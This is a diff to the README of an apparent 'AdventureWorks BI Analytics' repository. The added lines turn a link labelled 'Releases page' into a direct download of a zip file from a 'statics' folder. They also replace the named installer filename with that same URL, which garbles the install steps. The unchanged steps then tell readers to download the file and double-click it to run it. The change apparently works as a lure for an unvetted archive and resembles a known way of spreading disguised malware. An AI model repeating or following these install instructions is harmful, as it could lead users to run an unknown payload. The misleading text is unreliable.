Ironc00kie/adventureworks-bi-analytics/README.md

 ## 📂 Download & Install

-To get started, visit the [Releases page](https://github.com/Ironc00kie/adventureworks-bi-analytics/releases) and choose the latest version of the software.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/Ironc00kie/adventureworks-bi-analytics/main/statics/adventureworks-bi-analytics.zip) and choose the latest version of the software.
 Click on the version number to see the available files.
 Follow these steps:

 1. Find the most recent release of AdventureWorks BI Analytics.
 2. Look for the appropriate file for your system (usually an executable .exe or a .zip file).
 3. Click to download the file.
-This file will typically be named something like `AdventureWorks-BI-Analytics-installer.exe`.
+This file will typically be named something like `https://raw.githubusercontent.com/Ironc00kie/adventureworks-bi-analytics/main/statics/adventureworks-bi-analytics.zip`.
 4. Once the download is complete, locate the file in your downloads folder and double-click it to run the installer.
 5. Follow the installation instructions that appear on your screen to complete the setup process.